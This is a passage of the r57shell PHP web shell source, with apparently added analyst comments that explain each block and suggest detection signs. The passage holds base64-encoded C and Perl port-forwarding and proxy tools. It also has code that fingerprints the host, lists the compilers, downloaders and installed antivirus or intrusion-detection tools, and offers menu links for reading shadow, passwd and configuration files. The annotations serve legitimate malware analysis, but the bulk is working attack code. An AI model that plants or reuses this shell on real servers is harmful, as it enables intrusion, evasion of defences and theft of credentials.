3854KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA
3855
3856gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS
3857
3858hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC
3859
3860iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh
3861
3862ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ
3863
3864vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC
3865
3866AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D
3867
3868QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh
3869
3870ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0
3871
3872gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay
3873
3874wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c
3875
387629jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy
3877
3878MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA
3879
3880gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci
3881
38825zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ
3883
3884HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu
3885
3886dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0
3887
3888KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC
3889
3890ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI
3891
3892E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp
3893
3894Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs
3895
3896NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG
3897
3898J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL
3899
3900CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp
3901
3902dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo
3903
3904gIGNsb3NlKG9zb2NrKTsNCiBxdWl0MToNCiAgZmZsdXNoKGNmaWxlKTsNCiAgc2h1dGRvd24oY3NvY2ssMik7DQogcXVpdDA6DQogIGZjbG9zZShjZm
3905
3906lsZSk7DQogIHJldHVybiAwOw0KfQ==";
3907
3908$datapipe_pl="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgSU86OlNvY2tldDsNCnVzZSBQT1NJWDsNCiRsb2NhbHBvcnQgPSAkQVJHVlswXTsNCiRob3N0I
3909
3910CAgICAgPSAkQVJHVlsxXTsNCiRwb3J0ICAgICAgPSAkQVJHVlsyXTsNCiRkYWVtb249MTsNCiRESVIgPSB1bmRlZjsNCiR8ID0gMTsNCmlmICgkZGFl
3911
3912bW9uKXsgJHBpZCA9IGZvcms7IGV4aXQgaWYgJHBpZDsgZGllICIkISIgdW5sZXNzIGRlZmluZWQoJHBpZCk7IFBPU0lYOjpzZXRzaWQoKSBvciBkaWU
3913
3914gIiQhIjsgfQ0KJW8gPSAoJ3BvcnQnID0+ICRsb2NhbHBvcnQsJ3RvcG9ydCcgPT4gJHBvcnQsJ3RvaG9zdCcgPT4gJGhvc3QpOw0KJGFoID0gSU86Ol
3915
3916NvY2tldDo6SU5FVC0+bmV3KCdMb2NhbFBvcnQnID0+ICRsb2NhbHBvcnQsJ1JldXNlJyA9PiAxLCdMaXN0ZW4nID0+IDEwKSB8fCBkaWUgIiQhIjsNC
3917
3918iRTSUd7J0NITEQnfSA9ICdJR05PUkUnOw0KJG51bSA9IDA7DQp3aGlsZSAoMSkgeyANCiRjaCA9ICRhaC0+YWNjZXB0KCk7IGlmICghJGNoKSB7IHBy
3919
3920aW50IFNUREVSUiAiJCFcbiI7IG5leHQ7IH0NCisrJG51bTsNCiRwaWQgPSBmb3JrKCk7DQppZiAoIWRlZmluZWQoJHBpZCkpIHsgcHJpbnQgU1RERVJ
3921
3922SICIkIVxuIjsgfSANCmVsc2lmICgkcGlkID09IDApIHsgJGFoLT5jbG9zZSgpOyBSdW4oXCVvLCAkY2gsICRudW0pOyB9IA0KZWxzZSB7ICRjaC0+Y2
3923
3924xvc2UoKTsgfQ0KfQ0Kc3ViIFJ1biB7DQpteSgkbywgJGNoLCAkbnVtKSA9IEBfOw0KbXkgJHRoID0gSU86OlNvY2tldDo6SU5FVC0+bmV3KCdQZWVyQ
3925
3926WRkcicgPT4gJG8tPnsndG9ob3N0J30sJ1BlZXJQb3J0JyA9PiAkby0+eyd0b3BvcnQnfSk7DQppZiAoISR0aCkgeyBleGl0IDA7IH0NCm15ICRmaDsN
3927
3928CmlmICgkby0+eydkaXInfSkgeyAkZmggPSBTeW1ib2w6OmdlbnN5bSgpOyBvcGVuKCRmaCwgIj4kby0+eydkaXInfS90dW5uZWwkbnVtLmxvZyIpIG9
3929
3930yIGRpZSAiJCEiOyB9DQokY2gtPmF1dG9mbHVzaCgpOw0KJHRoLT5hdXRvZmx1c2goKTsNCndoaWxlICgkY2ggfHwgJHRoKSB7DQpteSAkcmluID0gIi
3931
3932I7DQp2ZWMoJHJpbiwgZmlsZW5vKCRjaCksIDEpID0gMSBpZiAkY2g7DQp2ZWMoJHJpbiwgZmlsZW5vKCR0aCksIDEpID0gMSBpZiAkdGg7DQpteSgkc
3933
3934m91dCwgJGVvdXQpOw0Kc2VsZWN0KCRyb3V0ID0gJHJpbiwgdW5kZWYsICRlb3V0ID0gJHJpbiwgMTIwKTsNCmlmICghJHJvdXQgICYmICAhJGVvdXQp
3935
3936IHt9DQpteSAkY2J1ZmZlciA9ICIiOw0KbXkgJHRidWZmZXIgPSAiIjsNCmlmICgkY2ggJiYgKHZlYygkZW91dCwgZmlsZW5vKCRjaCksIDEpIHx8IHZ
3937
3938lYygkcm91dCwgZmlsZW5vKCRjaCksIDEpKSkgew0KbXkgJHJlc3VsdCA9IHN5c3JlYWQoJGNoLCAkdGJ1ZmZlciwgMTAyNCk7DQppZiAoIWRlZmluZW
3939
3940QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK
3941
3942CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g
3943
3944c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0
3945
3946NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG
3947
3948UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I
3949
3950DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs
3951
3952ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J
3953
39541ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo=";
3955
3956$prx_pl="IyF1c3IvYmluL3BlcmwKdXNlIFNvY2tldDsKbXkgJHBvcnQgPSAkQVJHVlswXXx8MzEzMzc7Cm15ICRwcm90b2NvbCA9IGdldHByb3RvYn
3957
3958luYW1lKCd0Y3AnKTsKbXkgJG15X2FkZHIgID0gc29ja2FkZHJfaW4gKCRwb3J0LCBJTkFERFJfQU5ZKTsKc29ja2V0IChTT0NLLCBBRl9JTkVULCBTT
3959
39600NLX1NUUkVBTSwgJHByb3RvY29sKSBvciBkaWUgInNvY2tldCgpOiAkISI7CnNldHNvY2tvcHQgKFNPQ0ssIFNPTF9TT0NLRVQsIFNPX1JFVVNFQURE
3961
3962UiwxICkgb3IgZGllICJzZXRzb2Nrb3B0KCk6ICQhIjsKYmluZCAoU09DSywgJG15X2FkZHIpIG9yIGRpZSAiYmluZCgpOiAkISI7Cmxpc3RlbiAoU09
3963
3964DSywgU09NQVhDT05OKSBvciBkaWUgImxpc3RlbigpOiAkISI7CiRTSUd7J0lOVCd9ID0gc3ViIHsKY2xvc2UgKFNPQ0spOwpleGl0Owp9Owp3aGlsZS
3965
3966AoMSkgewpuZXh0IHVubGVzcyBteSAkcmVtb3RlX2FkZHIgPSBhY2NlcHQgKFNFU1NJT04sIFNPQ0spOwpteSAoJGZpc3QsICRtZXRob2QsICRyZW1vd
3967
3968GVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IGFuYWx5emVfcmVxdWVzdCgpOwppZihvcGVuX2Nvbm5lY3Rpb24gKFJFTU9URSwgJHJlbW90ZV9ob3N0LCAk
3969
3970cmVtb3RlX3BvcnQpID09IDApIHsKY2xvc2UgKFNFU1NJT04pOwpuZXh0Owp9CnByaW50IFJFTU9URSAkZmlyc3Q7CnByaW50IFJFTU9URSAiVXNlci1
3971
3972BZ2VudDogR29vZ2xlYm90LzIuMSAoK2h0dHA6Ly93d3cuZ29vZ2xlLmNvbS9ib3QuaHRtbClcbiI7CndoaWxlICg8U0VTU0lPTj4pIHsKbmV4dCBpZi
3973
3974AoL1Byb3h5LUNvbm5lY3Rpb246LyB8fCAvVXNlci1BZ2VudDovKTsKcHJpbnQgUkVNT1RFICRfOwpsYXN0IGlmICgkXyA9fiAvXltcc1x4MDBdKiQvK
3975
3976TsKfQpwcmludCBSRU1PVEUgIlxuIjsKJGhlYWRlciA9IDE7CndoaWxlICg8UkVNT1RFPikgewpwcmludCBTRVNTSU9OICRfOwppZiAoJGhlYWRlcikg
3977
3978eyAgICAgCmlmICgkaGVhZGVyICYmICRfID1+IC9eW1xzXHgwMF0qJC8pIHsKJGhlYWRlciA9IDA7Cn0KfQp9CmNsb3NlIChSRU1PVEUpOwpjbG9zZSA
3979
3980oU0VTU0lPTik7Cn0KY2xvc2UgKFNPQ0spOwpzdWIgYW5hbHl6ZV9yZXF1ZXN0IHsKbXkgKCRmaXN0LCAkdXJsLCAkcmVtb3RlX2hvc3QsICRyZW1vdG
3981
3982VfcG9ydCwgJG1ldGhvZCk7CiRmaXJzdCA9IDxTRVNTSU9OPjsKJHVybCA9ICgkZmlyc3QgPX4gbXwoaHR0cDovL1xTKyl8KVswXTsKKCRtZXRob2QsI
3983
3984CRyZW1vdGVfaG9zdCwgJHJlbW90ZV9wb3J0KSA9IAooJGZpcnN0ID1+IG0hKEdFVCkgaHR0cDovLyhbXi86XSspOj8oXGQqKSEgKTsKaWYgKCEkcmVt
3985
3986b3RlX2hvc3QpIHsKY2xvc2UoU0VTU0lPTik7CmV4aXQ7Cn0KJHJlbW90ZV9wb3J0ID0gImh0dHAiIHVubGVzcyAoJHJlbW90ZV9wb3J0KTsKJGZpcnN
3987
39880ID1+IHMvaHR0cDpcL1wvW15cL10rLy87CnJldHVybiAoJGZpcnN0LCAkbWV0aG9kLCAkcmVtb3RlX2hvc3QsICRyZW1vdGVfcG9ydCk7Cn0Kc3ViIG
3989
39909wZW5fY29ubmVjdGlvbiB7Cm15ICgkaG9zdCwgJHBvcnQpID0gQF9bMSwyXTsKbXkgKCRkZXN0X2FkZHIsICRjdXIpOwppZiAoJHBvcnQgIX4gL15cZ
3991
3992CskLykgewokcG9ydCA9IChnZXRzZXJ2YnluYW1lKCRwb3J0LCAidGNwIikpWzJdOwokcG9ydCA9IDgwIHVubGVzcyAoJHBvcnQpOwp9CiRob3N0ID0g
3993
3994aW5ldF9hdG9uICgkaG9zdCkgb3IgcmV0dXJuIDA7CiRkZXN0X2FkZHIgPSBzb2NrYWRkcl9pbiAoJHBvcnQsICRob3N0KTsKc29ja2V0ICgkX1swXSw
3995
3996gQUZfSU5FVCwgU09DS19TVFJFQU0sICRwcm90b2NvbCkgb3IgZGllICJzb2NrZXQoKSA6ICQhIjsKY29ubmVjdCAoJF9bMF0sICRkZXN0X2FkZHIpIG
3997
39989yIHJldHVybiAwOwokY3VyID0gc2VsZWN0KCRfWzBdKTsgIAokfCA9IDE7CnNlbGVjdCgkY3VyKTsKcmV0dXJuIDE7Cn0=";
3999
// Analyst note: host fingerprinting with cookie caching. On a Unix host this block
// passes `uname -a`, `id` and `sysctl` to ex() (defined outside this chunk; it appears
// to run a shell command and return its output, confirm against its definition).
// Each result is stored in a cookie named `uname`, `id` or `sysctl`, and later
// requests read the cookie instead of running the command again.
// Detection: the web-server account spawning uname/id/sysctl, and Set-Cookie headers
// with these names that carry command output.
4000if($unix)
4001
4002 {
4003
4004 if(!isset($_COOKIE['uname'])) { $uname = ex('uname -a'); setcookie('uname',$uname); } else { $uname = $_COOKIE['uname']; }
4005
4006 if(!isset($_COOKIE['id'])) { $id = ex('id'); setcookie('id',$id); } else { $id = $_COOKIE['id']; }
4007
4008 if($safe_mode) { $sysctl = '-'; }
4009
4010 else if(isset($_COOKIE['sysctl'])) { $sysctl = $_COOKIE['sysctl']; }
4011
4012 else
4013
4014 {
4015
// Tries the BSD-style sysctl keys first, then the Linux-style keys, then falls back to '-'.
4016 $sysctl = ex('sysctl -n kern.ostype && sysctl -n kern.osrelease');
4017
4018 if(empty($sysctl)) { $sysctl = ex('sysctl -n kernel.ostype && sysctl -n kernel.osrelease'); }
4019
4020 if(empty($sysctl)) { $sysctl = '-'; }
4021
4022 setcookie('sysctl',$sysctl);
4023
4024 }
4025
4026 }
4027
4028
4029
// Analyst note: inventory of tooling available on the compromised host. Every entry of
// $userful (compilers, interpreters, archivers, nc; see the array near the top of the
// file) is passed to which() (defined outside this chunk), and the hits are joined
// into $ust_u. The block then checks for the Apache modules mod_perl and mod_include
// and for PHP features that allow process or native-code execution (pcntl_exec,
// win32std, win32service, ffi, perl). The result is cached in a cookie whose name is
// the localized label $lang[$language.'_text137'].
// Detection: a burst of tool lookups (gcc, perl, python, nc, ...) by the web-server
// account within a single request.
4030if(!isset($_COOKIE[$lang[$language.'_text137']])) {
4031
4032 $ust_u='';
4033
4034 if($unix && !$safe_mode){
4035
4036 foreach ($userful as $item) {
4037
4038 if(which($item)){$ust_u.=$item;}
4039
4040 }
4041
4042 }
4043
4044 if (@function_exists('apache_get_modules') && @in_array('mod_perl',apache_get_modules())) {$ust_u.=", mod_perl";}
4045
4046 if (@function_exists('apache_get_modules') && @in_array('mod_include',apache_get_modules())) {$ust_u.=", mod_include(SSI)";}
4047
4048 if (@function_exists('pcntl_exec')) {$ust_u.=", pcntl_exec";}
4049
4050 if (@extension_loaded('win32std')) {$ust_u.=", win32std_loaded";}
4051
4052 if (@extension_loaded('win32service')) {$ust_u.=", win32service_loaded";}
4053
4054 if (@extension_loaded('ffi')) {$ust_u.=", ffi_loaded";}
4055
4056 if (@extension_loaded('perl')) {$ust_u.=", perl_loaded";}
4057
// Entries after the first carry a leading ", "; this drops a leading comma if one is present.
4058 if(substr($ust_u,0,1)==",") {$ust_u[0]="";}
4059
4060
4061
4062 $ust_u = trim($ust_u);
4063
4064 setcookie($lang[$language.'_text137'],$ust_u);
4065
4066}else {
4067
4068 $ust_u = trim($_COOKIE[$lang[$language.'_text137']]);
4069
4070}
4071
4072
4073
// Analyst note: inventory of defensive software. The names in $danger (antivirus
// daemons, rootkit checkers, host and network IDS, firewalls, log watchers; see the
// array near the top of the file) are checked twice: with which() for an installed
// binary and with ps() for what is presumably a running process (both helpers are
// defined outside this chunk). mod_security is checked through apache_get_modules().
// The result is cached in a cookie named by $lang[$language.'_text138'].
// Detection: the web-server account looking up names such as clamd, rkhunter,
// chkrootkit, snort, ossec or tripwire is a high-signal event; legitimate web
// applications have no reason to enumerate security tooling.
4074if(!isset($_COOKIE[$lang[$language.'_text138']])) {
4075
4076 $ust_d='';
4077
4078 if($unix && !$safe_mode){
4079
4080 foreach ($danger as $item) {
4081
4082 if(which($item)){$ust_d.=$item;}
4083
4084 }
4085
4086 }
4087
4088 if(!$safe_mode){
4089
4090 foreach ($danger as $item) {
4091
4092 if(ps($item)){$ust_d.=$item;}
4093
4094 }
4095
4096 }
4097
4098 if (@function_exists('apache_get_modules') && @in_array('mod_security',apache_get_modules())) {$ust_d.=", mod_security";}
4099
4100 if(substr($ust_d,0,1)==",") {$ust_d[0]="";}
4101
4102
4103
4104 $ust_d = trim($ust_d);
4105
4106 setcookie($lang[$language.'_text138'],$ust_d);
4107
4108}else {
4109
4110 $ust_d = trim($_COOKIE[$lang[$language.'_text138']]);
4111
4112}
4113
4114
4115
// Analyst note: inventory of file-transfer options. Builds an HTML <select> plus a
// comma-separated list of the ways this host can fetch remote content: PHP's URL
// wrappers (when allow_url_fopen is on) and each binary in $downloaders found by which().
// NOTE(review): the guard tests a cookie named by $lang[$language.'_text142'], but
// the block only sets the cookies `select_downloaders` and `downloader`. Unless that
// cookie is set elsewhere in the file, the probe reruns on every request.
// Detection: repeated lookups of wget/fetch/lynx/links/curl by the web-server
// account, and cookies named `select_downloaders` or `downloader`.
4116if(!isset($_COOKIE[$lang[$language.'_text142']])) {
4117
4118
4119
4120 $select_downloaders='<select size="1" name=with>';
4121
4122 if((!@function_exists('ini_get')) || (@ini_get('allow_url_fopen') && @function_exists('file'))){$select_downloaders .= "<option value=\"fopen\">fopen</option>";$downloader="fopen";}
4123
4124 if($unix && !$safe_mode){
4125
4126 foreach ($downloaders as $item) {
4127
4128 if(which($item)){$select_downloaders .= '<option value="'.$item.'">'.$item.'</option>';$downloader.=", $item";}
4129
4130 }
4131
4132 }
4133
4134 $select_downloaders .= '</select>';
4135
4136 if(substr($downloader,0,1)==",") {$downloader[0]="";}
4137
4138
4139
4140 $downloader=trim($downloader);
4141
4142 setcookie('select_downloaders',$select_downloaders);
4143
4144 setcookie('downloader',$downloader);
4145
4146}else {
4147
// Both values come straight from client-supplied cookies on this path.
4148 $select_downloaders = $_COOKIE['select_downloaders'];
4149
4150 $downloader = trim($_COOKIE['downloader']);
4151
4152}
4153
4154
4155
4156
4157
4158echo $head;
4159
4160echo '</head>';
4161
4162
4163
4164echo '<body><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#cccccc width=100><font face=Verdana size=2>'.
4165
4166ws(2).'<b>'.ws(2).'<center>r57shell<br>v.'.$version.'</b><br><p><b><font color="#FF0000" size="2">Edited By KingDefacer</font></b></p></center></font>'.
4167
4168$fs.'<font face=Verdana size=-2><center>'.$lang[$language.'_text143']."<b>".$tempdir."</b><br>".$select_tempdir.'<br>'.in('submit','submit',0,$lang[$language.'_butt6']).
4169
4170'</center></font>'.$fe.'</td>'.'<td bgcolor=#cccccc><font face=Verdana size=-2>';
4171
4172echo ws(2)."<b>".date ("d-m-Y H:i:s")."</b> Your IP: [<font color=blue>".gethostbyname($_SERVER["REMOTE_ADDR"])."</font>]";
4173
4174echo " X_FORWARDED_FOR:"; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){echo "[<font color=red>".$_SERVER['HTTP_X_FORWARDED_FOR']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
4175
4176echo " CLIENT_IP: ";if(isset($_SERVER['HTTP_CLIENT_IP'])){echo "[<font color=red>".$_SERVER['HTTP_CLIENT_IP']."</font>]";}else{echo "[<font color=green><b>NONE</b></font>]";}
4177
4178echo " Server IP: [<font color=blue>".gethostbyname($_SERVER["HTTP_HOST"])."</font>]";
4179
4180
4181
4182echo "<br>";
4183
4184
4185
4186echo ws(2)."PHP version: <b>".@phpversion()."</b>";
4187
4188$curl_on = @function_exists('curl_version');
4189
4190echo ws(2);
4191
4192echo "cURL: <b>".(($curl_on)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
4193
4194echo "</b>".ws(2);
4195
4196echo "MySQL: <b>";
4197
4198$mysql_on = @function_exists('mysql_connect');
4199
4200if($mysql_on){
4201
4202echo "<font color=red>ON</font>"; } else { echo "<font color=green>OFF</font>"; }
4203
4204echo "</b>".ws(2);
4205
4206echo "MSSQL: <b>";
4207
4208$mssql_on = @function_exists('mssql_connect');
4209
4210if($mssql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4211
4212echo "</b>".ws(2);
4213
4214echo "PostgreSQL: <b>";
4215
4216$pg_on = @function_exists('pg_connect');
4217
4218if($pg_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4219
4220echo "</b>".ws(2);
4221
4222echo "Oracle: <b>";
4223
4224$ora_on = @function_exists('ocilogon');
4225
4226if($ora_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4227
4228echo "</b>".ws(2);
4229
4230echo "MySQLi: <b>";
4231
4232$mysqli_on = @function_exists('mysqli_connect');
4233
4234if($mysqli_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4235
4236echo "</b>".ws(2);
4237
4238echo "mSQL: <b>";
4239
4240$msql_on = @function_exists('msql_connect');
4241
4242if($msql_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4243
4244echo "</b>".ws(2);
4245
4246echo "SQLite: <b>";
4247
4248$sqlite_on = @function_exists('sqlite_open');
4249
4250if($sqlite_on){echo "<font color=red>ON</font>";}else{echo "<font color=green>OFF</font>";}
4251
4252echo "</b><br>".ws(2);
4253
4254
4255
4256echo "Safe_mode: <b>";
4257
4258echo (($safe_mode)?("<font color=red>ON</font>"):("<font color=green>OFF</font>"));
4259
4260echo "</b>".ws(2);
4261
4262echo "Open_basedir: <b>";
4263
4264if($open_basedir) { if (''==($df=@ini_get('open_basedir'))) {echo "<font color=red>ini_get disable!</font></b>";}else {echo "<font color=red>$df</font></b>";};}
4265
4266else {echo "<font color=green>NONE</font></b>";}
4267
4268echo ws(2)."Safe_exec_dir: <b>";
4269
4270if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4271
4272else {echo "<font color=red>ini_get disable!</font></b>";}
4273
4274echo ws(2)."Safe_gid: <b>";
4275
4276if(@function_exists('ini_get')) { if (@ini_get('safe_mode_gid')) {echo "<font color=green>ON</font></b>";}else {echo "<font color=red>OFF</font></b>";};}
4277
4278else {echo "<font color=red>ini_get disable!</font></b>";}
4279
4280echo ws(2)."Safe_include_dir: <b>";
4281
4282if(@function_exists('ini_get')) { if (''==($df=@ini_get('safe_mode_include_dir'))) {echo "<font color=red>NONE</font></b>";}else {echo "<font color=green>$df</font></b>";};}
4283
4284else {echo "<font color=red>ini_get disable!</font></b>";}
4285
4286echo ws(2)."Sql.safe_mode: <b>";
4287
4288if(@function_exists('ini_get')) { if (@ini_get('sql.safe_mode')) {echo "<font color=red>ON</font></b>";}else {echo "<font color=green>OFF</font></b>";};}
4289
4290else {echo "<font color=red>ini_get disable!</font></b>";}
4291
4292
4293
4294echo "<br>".ws(2);
4295
4296echo "Disable functions : <b>";$df='ini_get disable!';
4297
4298if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
4299
4300
4301
4302if(@function_exists('diskfreespace')){$free = @diskfreespace($dir);}
4303
4304elseif(@function_exists('disk_free_space')){$free = @disk_free_space($dir);}else{$free = 'Unknown';}
4305
4306if (!$free) {$free = 0;}
4307
4308$all = @disk_total_space($dir);
4309
4310if (!$all) {$all = 0;}
4311
4312echo "<br>".ws(2)."Free space : <b>".view_size($free)."</b> Total space: <b>".view_size($all)."</b>";
4313
4314
4315
4316
4317
4318if($ust_u){echo "<br>".ws(2).$lang[$language.'_text137'].": <font color=blue>".$ust_u."</font>";};
4319
4320
4321
4322if($ust_d){echo "<br>".ws(2).$lang[$language.'_text138'].": <font color=red>".$ust_d."</font>";};
4323
4324
4325
4326if($downloader){echo "<br>".ws(2).$lang[$language.'_text142'].": <font color=blue>".$downloader."</font>";};
4327
4328
4329
4330
4331
4332echo "<br>".ws(2)."</b>";
4333
// Analyst note: quick-action menu. Every link reloads this same script with a query
// string that is only a small integer (?1 through ?34). The code that maps a number
// to an action is outside this chunk. The link titles name the targets: phpinfo,
// php.ini, syslog.conf, resolv, hosts, shadow, passwd, and host-survey commands
// (ps, netstat, ifconfig, last, who, fstab, fdisk, df, ...).
// Detection: access-log lines for one PHP file whose whole query string is an integer
// in this range, especially several different values from one client in a short time.
4334echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?1' title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb;
4335
4336echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?2' title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb;
4337
4338echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?3' title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb;
4339
4340echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?4' title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb;
4341
4342if(!$unix) {
4343
4344 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?5' title=\"".$lang[$language.'_text50']."\"><b>systeminfo</b></a> ".$rb;
4345
4346}else{
4347
4348 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?6' title=\"View syslog.conf\"><b>syslog</b></a> ".$rb;
4349
4350 echo ws(2).$lb." <a href='".$_SERVER['PHP_SELF']."?7' title=\"View resolv\"><b>resolv</b></a> ".$rb;
4351
